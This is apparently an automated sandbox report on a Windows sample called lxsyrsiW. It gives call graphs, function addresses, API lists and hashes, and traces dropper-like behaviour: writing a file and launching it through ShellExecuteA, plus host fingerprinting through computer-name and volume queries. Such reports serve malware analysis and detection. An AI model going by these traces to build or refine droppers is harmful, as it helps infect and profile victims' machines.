100483ce 9936->9940 9941 100483ba 9936->9941 9939 100415c0 __dosmaperr 20 API calls 9938->9939 9939->9897 9997 1004159d 9940->9997 9942 100415d3 __dosmaperr 20 API calls 9941->9942 9944 100483bf 9942->9944 9945 100415c0 __dosmaperr 20 API calls 9944->9945 9945->9897 10038 10048446 RtlLeaveCriticalSection 9946->10038 9948 100481f4 9948->9879 10002 100487ba 9949->10002 10024 10048564 9952->10024 9954 10047dd1 9954->9916 9954->9917 9955 10047dcc 9955->9954 9956 1004185b _abort 38 API calls 9955->9956 9957 10047df4 9956->9957 9957->9954 9958 10047e12 GetConsoleMode 9957->9958 9958->9954 9960 10047da9 9959->9960 9962 10047d74 9959->9962 9960->9933 9961 10048853 WriteConsoleW CreateFileW 9961->9962 9962->9960 9962->9961 9963 10047dab GetLastError 9962->9963 9963->9960 9970 10047bff 9964->9970 9974 10047d11 9964->9974 9965 10044c0d _abort 5 API calls 9967 10047d4b 9965->9967 9967->9933 9968 10047937 40 API calls __fassign 9968->9970 9969 10047c85 WideCharToMultiByte 9971 10047cab WriteFile 9969->9971 9969->9974 9970->9968 9970->9969 9973 10047cdc WriteFile 9970->9973 9970->9974 10033 1004304d 9970->10033 9971->9970 9972 10047d34 GetLastError 9971->9972 9972->9974 9973->9970 9973->9972 9974->9965 9980 10047f20 9975->9980 9976 10047fe2 9977 10044c0d _abort 5 API calls 9976->9977 9979 10047ffb 9977->9979 9978 10047f9e WriteFile 9978->9980 9981 10047fe4 GetLastError 9978->9981 9979->9933 9980->9976 9980->9978 9981->9976 9989 1004800e 9982->9989 9983 10048119 9984 10044c0d _abort 5 API calls 9983->9984 9985 10048128 9984->9985 9985->9933 9986 10048090 WideCharToMultiByte 9987 100480c5 WriteFile 9986->9987 9988 10048111 GetLastError 9986->9988 9987->9988 9987->9989 9988->9983 9989->9983 9989->9986 9989->9987 9994 10047e41 9990->9994 9991 10047ef4 9993 10044c0d _abort 5 API calls 9991->9993 9992 10047eb3 WriteFile 9992->9994 9995 10047ef6 GetLastError 9992->9995 9996 10047f0d 9993->9996 9994->9991 9994->9992 9995->9991 9996->9933 9998 100415c0 __dosmaperr 20 API calls 9997->9998 9999 100415a8 __dosmaperr 9998->9999 10000 100415d3 __dosmaperr 20 API calls 9999->10000 10001 100415bb 10000->10001 10001->9897 10011 100484fa 10002->10011 10004 100487cc 10005 100487d4 10004->10005 10006 100487e5 SetFilePointerEx 10004->10006 10007 100415d3 __dosmaperr 20 API calls 10005->10007 10008 100487d9 10006->10008 10009 100487fd GetLastError 10006->10009 10007->10008 10008->9907 10010 1004159d __dosmaperr 20 API calls 10009->10010 10010->10008 10012 10048507 10011->10012 10015 1004851c 10011->10015 10013 100415c0 __dosmaperr 20 API calls 10012->10013 10014 1004850c 10013->10014 10017 100415d3 __dosmaperr 20 API calls 10014->10017 10016 100415c0 __dosmaperr 20 API calls 10015->10016 10018 10048541 10015->10018 10019 1004854c 10016->10019 10020 10048514 10017->10020 10018->10004 10021 100415d3 __dosmaperr 20 API calls 10019->10021 10020->10004 10022 10048554 10021->10022 10023 10041517 _abort 26 API calls 10022->10023 10023->10020 10025 10048571 10024->10025 10026 1004857e 10024->10026 10027 100415d3 __dosmaperr 20 API calls 10025->10027 10029 1004858a 10026->10029 10030 100415d3 __dosmaperr 20 API calls 10026->10030 10028 10048576 10027->10028 10028->9955 10029->9955 10031 100485ab 10030->10031 10032 10041517 _abort 26 API calls 10031->10032 10032->10028 10034 1004185b _abort 38 API calls 10033->10034 10035 10043058 10034->10035 10036 10041964 __fassign 38 API calls 10035->10036 10037 10043068 10036->10037 10037->9970 10038->9948 10042 100485ba 10039->10042 10041 10048660 10041->9863 10043 100485c6 _abort 10042->10043 10053 10048423 RtlEnterCriticalSection 10043->10053 10045 100485d4 10046 10048606 10045->10046 10047 100485fb 10045->10047 10048 100415d3 __dosmaperr 20 API calls 10046->10048 10054 100486e3 10047->10054 10050 10048601 10048->10050 10069 10048630 10050->10069 10052 10048623 _abort 10052->10041 10053->10045 10055 100484fa 26 API calls 10054->10055 10058 100486f3 10055->10058 10056 100486f9 10072 10048469 10056->10072 10058->10056 10061 100484fa 26 API calls 10058->10061 10068 1004872b 10058->10068 10059 100484fa 26 API calls 10062 10048737 CloseHandle 10059->10062 10064 10048722 10061->10064 10062->10056 10065 10048743 GetLastError 10062->10065 10063 10048773 10063->10050 10067 100484fa 26 API calls 10064->10067 10065->10056 10066 1004159d __dosmaperr 20 API calls 10066->10063 10067->10068 10068->10056 10068->10059 10081 10048446 RtlLeaveCriticalSection 10069->10081 10071 1004863a 10071->10052 10073 100484df 10072->10073 10074 10048478 10072->10074 10075 100415d3 __dosmaperr 20 API calls 10073->10075 10074->10073 10080 100484a2 10074->10080 10076 100484e4 10075->10076 10077 100415c0 __dosmaperr 20 API calls 10076->10077 10078 100484cf 10077->10078 10078->10063 10078->10066 10079 100484c9 SetStdHandle 10079->10078 10080->10078 10080->10079 10081->10071 9701 10040070 9702 1004007c 9701->9702 9705 1003ffe2 9702->9705 9706 1003fff9 9705->9706 9707 100415d3 __dosmaperr 20 API calls 9706->9707 9710 10040047 9706->9710 9708 1004003d 9707->9708 9709 10041517 _abort 26 API calls 9708->9709 9709->9710 9132 401475 memset 9133 58c000 9132->9133 9134 4014a2 __set_app_type _controlfp __getmainargs 9133->9134 9137 4013ff 9134->9137 9136 401518 exit 9138 40141a 9137->9138 9141 40108c memset memset 9138->9141 9140 401443 9140->9136 9142 401141 9141->9142 9143 40134e 9142->9143 9144 401164 strcmp 9142->9144 9143->9140 9145 401191 EntryPoint strcpy 9144->9145 9146 4011db EntryPoint getenv EntryPoint sprintf 9144->9146 9147 40126b fopen EntryPoint fwrite fclose 9145->9147 9146->9147 9148 401310 EntryPoint ShellExecuteA 9147->9148 9149 401349 9147->9149 9148->9149 9149->9140 9711 1004727a 9712 1003fd79 __fassign 38 API calls 9711->9712 9713 10047290 9712->9713 9714 1004729e 9713->9714 9715 100472b5 9713->9715 9716 100415d3 __dosmaperr 20 API calls 9714->9716 9718 100472ae 9715->9718 9720 100475b7 46 API calls 9715->9720 9717 100472a3 9716->9717 9719 10041517 _abort 26 API calls 9717->9719 9719->9718 9720->9715

                                                                                                                Executed Functions

                                                                                                                Function 1002CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 420COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: d$w
                                                                                                                • API String ID: 0-2400632791
                                                                                                                • Opcode ID: 8fc7dfa7953881f0eba443ccefee9132d4f71626532639c743b5b7031b98f681
                                                                                                                • Instruction ID: 3b58a7d1205b496063c1b2204a8da8191e59d498b0b538c9a3f1341f54984d67
                                                                                                                • Opcode Fuzzy Hash: 8fc7dfa7953881f0eba443ccefee9132d4f71626532639c743b5b7031b98f681
                                                                                                                • Instruction Fuzzy Hash: 9AC15634D0C7CEAAD791C6E0BC05FAA3BE4DF423D0FD74496FA468A0B3D6249C489652
                                                                                                                Function 10028550 Relevance: 21.5, APIs: 14, Instructions: 522COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1452528299-0
                                                                                                                • Opcode ID: 1ff04f09876d43afbe914d0138f07400b2449b49151b2f80d9e5eed3b2134e1f
                                                                                                                • Instruction ID: 4f459b812a85e78ac016215e267c0289a3fe05b3109a9c9d5ced4a8858fbf6f9
                                                                                                                • Opcode Fuzzy Hash: 1ff04f09876d43afbe914d0138f07400b2449b49151b2f80d9e5eed3b2134e1f
                                                                                                                • Instruction Fuzzy Hash: 81F1052CD0F2C29ED7D2C6207C407752BE4EB562E0FD74596FA4A860E2D7249F498326
                                                                                                                Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207filestringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                • String ID: %s\%s
                                                                                                                • API String ID: 2742963760-4073750446
                                                                                                                • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59
                                                                                                                Function 1000CE90 Relevance: 16.2, APIs: 10, Instructions: 1188COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3564e4d55fca24635c9f640a300f4ded4c124eb8b1f5c188f8f6fb43cfb90a2d
                                                                                                                • Instruction ID: 6513e1061100fd1b8b0ef08946528139e367ca05e908543a0b3ce9998732708d
                                                                                                                • Opcode Fuzzy Hash: 3564e4d55fca24635c9f640a300f4ded4c124eb8b1f5c188f8f6fb43cfb90a2d
                                                                                                                • Instruction Fuzzy Hash: B3A26F7190D3C18FE361DB18C850B9EBBE1EFC53D8F09495EE4889729AD735A90487A3
                                                                                                                Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113filestringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1042 401155-401162 1043 401141-40114a 1042->1043 1044 401164-40118b strcmp 1042->1044 1045 401150 1043->1045 1046 40134e-401354 1043->1046 1047 401191-4011d6 EntryPoint strcpy 1044->1047 1048 4011db-401268 EntryPoint getenv EntryPoint sprintf 1044->1048 1045->1044 1049 40126b-40130a fopen EntryPoint fwrite fclose 1047->1049 1048->1049 1050 401310-401344 EntryPoint ShellExecuteA 1049->1050 1051 401349 1049->1051 1050->1051
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2992075992-0
                                                                                                                • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59
                                                                                                                Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1611591150-0
                                                                                                                • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769
                                                                                                                Function 1000B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1057 1000b180-1000b18f 1058 1000b2a3 1057->1058 1059 1000b2a5 1058->1059 1060 1000b306-1000b30b 1058->1060 1059->1060 1061 1000b2a7-1000b2c0 SetFilePointerEx 1059->1061 1067 1000b196-1000b1ba 1060->1067 1068 1000b23b 1060->1068 1064 1000b2c6 1061->1064 1065 1000b38d-1000b395 1061->1065 1064->1065 1066 1000b2cc-1000b2d0 1064->1066 1069 1000b2d6 1066->1069 1070 1000b1df-1000b1e6 1066->1070 1071 1000b1c0 1067->1071 1072 1000b3a6-1000b3ac 1067->1072 1068->1067 1073 1000b241 1068->1073 1069->1070 1074 1000b2dc-1000b2de 1069->1074 1071->1072 1075 1000b1c6-1000b1d3 1071->1075 1077 1000b3b2-1000b3b7 1072->1077 1078 1000b328-1000b346 SetFilePointerEx 1072->1078 1073->1060 1076 1000b247 1073->1076 1079 1000b2e0-1000b2ed WriteFile 1074->1079 1075->1079 1080 1000b1d9 1075->1080 1081 1000b322 1076->1081 1082 1000b24d 1076->1082 1080->1070 1080->1079 1081->1078 1083 1000b0d0-1000b0d8 SetFilePointerEx 1081->1083 1082->1081 1084 1000b253-1000b262 1082->1084 1085 1000b054-1000b056 1083->1085 1086 1000b0de 1083->1086 1087 1000b05c-1000b061 1085->1087 1086->1057
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE ref: 1000B2BA
                                                                                                                • WriteFile.KERNELBASE(?,?,00000004,?,00000000), ref: 1000B2E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$PointerWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 539440098-0
                                                                                                                • Opcode ID: 32631c146431d5caa784b435f80b75a1b640849307dfc12bec7041bd0071469d
                                                                                                                • Instruction ID: bfceab962039c3431f0d920990651090cd1c4c65727954dcb43a48a868385f99
                                                                                                                • Opcode Fuzzy Hash: 32631c146431d5caa784b435f80b75a1b640849307dfc12bec7041bd0071469d
                                                                                                                • Instruction Fuzzy Hash: DE318E7040CB80AEF301DF65886576FBFE0EF923E4F95859DE5D486299D3B889088793
                                                                                                                Function 100097E0 Relevance: 4.8, APIs: 3, Instructions: 308COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileSize.KERNEL32(?,10008FCC,?,00000001,?,00000002,?,?), ref: 100098BE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileSize
                                                                                                                • String ID:
                                                                                                                • API String ID: 3433856609-0
                                                                                                                • Opcode ID: d74f2fca9a77fe10a5de1895a53b4e69ebdba06ca88f7dd4cac146ae40992855
                                                                                                                • Instruction ID: 945e49c847fada588070ccd41f20cc94e8f566d75302129b1ddbdbf4f5afe422
                                                                                                                • Opcode Fuzzy Hash: d74f2fca9a77fe10a5de1895a53b4e69ebdba06ca88f7dd4cac146ae40992855
                                                                                                                • Instruction Fuzzy Hash: 0E910460C0D3C29FF792CA244D50A763BE0FB531E0F4A45AAE5C68A1AFDB259E05C353
                                                                                                                Function 10027DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1311 10027df0-10027dfa 1312 10027e00 1311->1312 1313 10028288-1002829a call 10010d80 1311->1313 1312->1313 1315 10027e06-10027e15 GetComputerNameW 1312->1315 1320 100282a0 1313->1320 1321 1002851e-1002852d call 10010d80 1313->1321 1316 100282b6-100282bb 1315->1316 1317 10027e1b 1315->1317 1317->1316 1319 10027e21-10027e2d 1317->1319 1320->1321 1323 100282a6 1320->1323 1325 10027dbc-10027dce 1323->1325 1326 100282ac 1323->1326 1333 10027d35 1325->1333 1334 10027d6c-10027d80 GetVolumeInformationW 1325->1334 1329 100282b2-100282b4 1326->1329 1330 10027d20-10027d2b 1326->1330 1329->1316 1331 10027d61-10027d68 1330->1331 1332 10027d2d-10027d94 1330->1332 1337 10027de5-10027dea 1331->1337 1338 10027d6a 1331->1338 1332->1331 1342 10027d96 1332->1342 1333->1334 1336 10027d37-10027d39 1333->1336 1339 10027d3b-10027d46 1336->1339 1340 10027d83-10027d8c GetWindowsDirectoryW 1337->1340 1341 10027dec 1337->1341 1338->1334 1338->1337 1343 10027d97-10027d98 1339->1343 1344 10027d48-10027dac 1339->1344 1340->1339 1346 10027d8e-10027da6 1340->1346 1341->1340 1345 10027dee 1341->1345 1342->1343 1347 10027de2 1343->1347 1348 10027d9a-10027d9f 1343->1348 1344->1343 1352 10027dae-10027db3 1344->1352 1345->1311 1346->1325 1351 10027da8 1346->1351 1351->1325 1353 10027daa-10027dba 1351->1353 1353->1325
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3545744682-0
                                                                                                                • Opcode ID: f3dfdc31cc27183ae44ef31ee2d0972980f6737d7a8368bfb4877219d4919641
                                                                                                                • Instruction ID: 5044bc66183f9a0c8fb5e43b9644b69d944f4be2a2ad3dd314c0752b6b08d565
                                                                                                                • Opcode Fuzzy Hash: f3dfdc31cc27183ae44ef31ee2d0972980f6737d7a8368bfb4877219d4919641
                                                                                                                • Instruction Fuzzy Hash: CD21DA3890A2816BD361D710BC05BF93AF8FF52790FC2488AFA8C591D2D3647D498367
                                                                                                                Function 10005F10 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: VhS`
                                                                                                                • API String ID: 0-1438808629
                                                                                                                • Opcode ID: fc3748b68d94d049562a0d418e99007f55a8802754c178d4ad4717a4a44346b7
                                                                                                                • Instruction ID: 81e7802e88a2e8759e0b2ab5fef3d46fa6bd4e812ee5d9bde0e72f4ce5cf71b6
                                                                                                                • Opcode Fuzzy Hash: fc3748b68d94d049562a0d418e99007f55a8802754c178d4ad4717a4a44346b7
                                                                                                                • Instruction Fuzzy Hash: BE71D331C0C3C38EF355C6248C146777BE2EB4A2E2F6686AAD5D58B0AED6778D44C352
                                                                                                                Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1489 401000-40102e malloc 1490 401031-401039 1489->1490 1491 401087-40108b 1490->1491 1492 40103f-401085 1490->1492 1492->1490
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                • API String ID: 2803490479-2443507578
                                                                                                                • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45
                                                                                                                Function 10005D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1495 10005d20 1496 10005d22 1495->1496 1497 10005d26-10005d2d 1495->1497 1496->1497 1498 10005d24 1496->1498 1499 10005d36-10005d37 1497->1499 1500 10005d2f 1497->1500 1498->1497 1502 10005d39-10005d42 VirtualAlloc 1499->1502 1503 10005d5d 1499->1503 1500->1499 1501 10005d30-10005d31 1500->1501 1504 10005d33-10005d35 1501->1504 1502->1504 1505 10005d44 1502->1505 1506 10005d64 1503->1506 1507 10005d5f 1503->1507 1504->1499 1505->1504 1510 10005d46-10005d50 1505->1510 1508 10005d66 1506->1508 1509 10005d69-10005d73 VirtualFree 1506->1509 1507->1506 1511 10005d61 1507->1511 1508->1509 1512 10005d68 1508->1512 1513 10005d52 1510->1513 1514 10005d54-10005d5b 1510->1514 1511->1506 1515 10005d63 1511->1515 1512->1509 1513->1514 1514->1503 1514->1506 1515->1506
                                                                                                                APIs
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 10005D6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 3ebe32634cebc0e6ba28336f4acad1c9254ce2d227efa467861c6f6b5a69768f
                                                                                                                • Instruction ID: 10f37380cb21cafac1f15da1ce1ba0c7b9493c247f18e36487c97ec66e7685fb
                                                                                                                • Opcode Fuzzy Hash: 3ebe32634cebc0e6ba28336f4acad1c9254ce2d227efa467861c6f6b5a69768f
                                                                                                                • Instruction Fuzzy Hash: 1FF0B464E04381AAFBFAC360DD9DB633AE0D7036EBF4A4447E141590BED5675D41C102
                                                                                                                Function 10006490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3f0270750c9285815a7f873a12642cee778a57825cbed459cc1f52dbb632ba1e
                                                                                                                • Instruction ID: f5d173d4cae944e8ad377c523d4776d1fd4076796be255565f4cde4383f34985
                                                                                                                • Opcode Fuzzy Hash: 3f0270750c9285815a7f873a12642cee778a57825cbed459cc1f52dbb632ba1e
                                                                                                                • Instruction Fuzzy Hash: 0331C670D0C3828AF351CA64CC4436A7AF3EB8E2E0F75859AD5858B19ED63A8D048752
                                                                                                                Function 10006086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE ref: 1000608C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 7b4e4ca92de925539c70dd9292a21fe46a6dd467e51982ba35b9f1b7c8ce00b4
                                                                                                                • Instruction ID: 43ca6a973a732ecce98daaa1a25a42009db911c9e78af6c4eab94d1d62504c44
                                                                                                                • Opcode Fuzzy Hash: 7b4e4ca92de925539c70dd9292a21fe46a6dd467e51982ba35b9f1b7c8ce00b4
                                                                                                                • Instruction Fuzzy Hash: 0501D671C4D3829EF351CB208C002677BF6EF4F2D0F2A869AE5819B0AAD6348D04C752
                                                                                                                Function 004013FF Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2430 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 4108700736-0
                                                                                                                • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                                Non-executed Functions

                                                                                                                Function 10041361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10041459
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 10041463
                                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 10041470
